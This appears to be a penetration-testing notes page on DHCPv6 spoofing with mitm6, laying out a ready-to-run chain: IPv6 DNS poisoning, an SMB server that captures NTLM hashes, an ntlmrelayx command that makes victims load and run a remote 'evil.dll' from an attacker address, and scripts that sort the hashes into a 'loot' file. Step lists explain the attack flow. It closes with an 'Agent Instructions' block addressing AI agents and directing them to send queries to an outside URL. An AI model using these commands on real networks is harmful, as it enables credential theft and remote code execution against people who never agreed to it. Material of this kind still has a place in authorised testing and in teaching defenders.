# DHCPv6 Spoofing

* <https://g-laurent.blogspot.com/2021/12/responder-and-ipv6-attacks.html>

## mitm6

* <https://github.com/fox-it/mitm6>
* <https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/>
* <https://intrinium.com/mitm6-pen-testing/>

Install:

```
$ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6
$ python3 setup.py install
Or
$ pipx install -f "git+https://github.com/fox-it/mitm6.git"
```

Generate a list of targets for NTLM relay and prepare a C2 listener and stager:

```
$ cme smb 192.168.1.0/24 --gen-relay-list relay.txt
```

Start SMB server to capture NTLM hashes and serve the stager:

```
$ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out
```

Get ready to relay authentication and try executing a command:

```
$ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-server
```

Start MitMing:

```
$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn
```

Parse, sort and save NTLM hashes:

```
# Users
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > net-ntlmv2.mitm6
$ sort -u -t: -k1,1 net-ntlmv2.mitm6 ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.mitm6

# Machines
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1
```

### Attack vectors

Grab hashes with `smbserver.py` (passive):

1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network.
2. Victims start to use attacker's machine as the primary DNS server.
3. `mitm6.py` on the attacker's machine acts like a rogue DNS server and responds with the attacker's IP for all incoming queries.
4. `smbserver.py` collects hashes during SMB requests from victims.

Relay authentication with ntlmrelayx.py (active):

1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network.
2. Victims start to use attacker's machine as the primary DNS server.
3. `mitm6.py` on the attacker's machine acts like a rogue DNS server, `ntlmrelayx.py` serves a custom WPAD file with an inexistent hostname (which will be resolved to the attacker's IP anyway) and acts like a rogue proxy server and `mitm6.py` responds with the attacker's IP for all the incoming DNS queries.
4. Victims grab the WPAD file and ask the rogue IPv6 DNS server (attacker's machine) to resolve its location - resolved to attacker's machine.
5. Victims go to the rogue proxy server and there `ntlmrelayx.py` responses with `HTTP 407 Proxy Authentication`.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/dhcpv6-spoofing.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.